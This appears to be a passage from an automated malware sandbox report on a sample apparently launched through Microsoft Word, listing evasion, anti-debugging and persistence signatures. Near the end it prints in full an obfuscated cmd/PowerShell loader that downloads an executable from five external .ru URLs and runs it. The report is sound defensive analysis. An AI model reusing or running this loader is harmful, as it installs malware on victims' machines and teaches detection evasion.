Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\bin\dtplugin\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\bin\plugin2\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\applet\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\cmm\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\deploy\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\ext\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\fonts\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\i386\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\images\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\images\cursors\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\jfr\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\management\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\security\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\limited\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\229.exeFile opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\ read data or list directory | synchronizeJump to behavior

Boot Survival:

barindex
Stores files to the Windows start menu directoryShow sources
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Start Menu\PSVULHG-MANUAL.txtJump to behavior
Source: C:\Windows\Temp\229.exeFile created: C:\Users\Default\Start Menu\3c4e07e63c4e000531d.lockJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Creates files in the recycle bin to hide itselfShow sources
Source: C:\Windows\Temp\229.exeFile created: C:\$Recycle.Bin\PSVULHG-MANUAL.txtJump to behavior
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Windows\Temp\229.exeCode function: 5_1_00414A70 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_1_00414A70
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812Thread sleep time: -922337203685477s >= -30000sJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_00408A8F lstrlenW,FindFirstFileExW,FindFirstFileW,FindNextFileW,CloseHandle,5_2_00408A8F
Source: C:\Windows\Temp\229.exeCode function: 5_2_0042C8FB FindFirstFileExW,5_2_0042C8FB
Source: C:\Windows\Temp\229.exeCode function: 5_1_0042C8FB FindFirstFileExW,5_1_0042C8FB
Contains functionality to query system informationShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_00404F8F GetSystemInfo,5_2_00404F8F
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmpBinary or memory string: Hyper-V</a></li><li><a href="https://masterhost.ru/service/hosting/vps/#vpsPlusMssql">VPS + MSSQL</a></li></ul></li></ul></nav><nav><ul class="nav"><li><a href="https://masterhost.ru/service/hardware/rent/">
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_0042959E IsDebuggerPresent,OutputDebugStringW,5_2_0042959E
Contains functionality to create guard pages, often used to hinder reverse engineering and debuggingShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_0040831E VirtualAlloc 00000000,00000000,?,00408131,000000105_2_0040831E
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_0040C05D GetModuleHandleA,LoadLibraryA,GetProcAddress,5_2_0040C05D
Contains functionality to read the PEBShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_0040108B mov esi, dword ptr fs:[00000030h]5_2_0040108B
Source: C:\Windows\Temp\229.exeCode function: 5_2_001E1530 mov eax, dword ptr fs:[00000030h]5_2_001E1530
Source: C:\Windows\Temp\229.exeCode function: 5_2_001E3104 mov eax, dword ptr fs:[00000030h]5_2_001E3104
Source: C:\Windows\Temp\229.exeCode function: 5_2_0042C54C mov eax, dword ptr fs:[00000030h]5_2_0042C54C
Source: C:\Windows\Temp\229.exeCode function: 5_2_0042C5C5 mov eax, dword ptr fs:[00000030h]5_2_0042C5C5
Source: C:\Windows\Temp\229.exeCode function: 5_2_0042C592 mov eax, dword ptr fs:[00000030h]5_2_0042C592
Source: C:\Windows\Temp\229.exeCode function: 5_2_004226CA mov eax, dword ptr fs:[00000030h]5_2_004226CA
Source: C:\Windows\Temp\229.exeCode function: 5_1_0042C54C mov eax, dword ptr fs:[00000030h]5_1_0042C54C
Source: C:\Windows\Temp\229.exeCode function: 5_1_0042C5C5 mov eax, dword ptr fs:[00000030h]5_1_0042C5C5
Source: C:\Windows\Temp\229.exeCode function: 5_1_0042C592 mov eax, dword ptr fs:[00000030h]5_1_0042C592
Source: C:\Windows\Temp\229.exeCode function: 5_1_004226CA mov eax, dword ptr fs:[00000030h]5_1_004226CA
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_00401B43 GetProcessHeap,5_2_00401B43
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Windows\Temp\229.exeCode function: 5_2_00415EBC SetUnhandledExceptionFilter,5_2_00415EBC
Source: C:\Windows\Temp\229.exeCode function: 5_1_00415FF1 SetUnhandledExceptionFilter,5_1_00415FF1
Source: C:\Windows\Temp\229.exeCode function: 5_1_00416212 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_00416212
Source: C:\Windows\Temp\229.exeCode function: 5_1_0041A667 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_1_0041A667
Source: C:\Windows\Temp\229.exeCode function: 5_1_00415E5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_1_00415E5F
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\229.exe 'C:\windows\temp\229.exe' Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
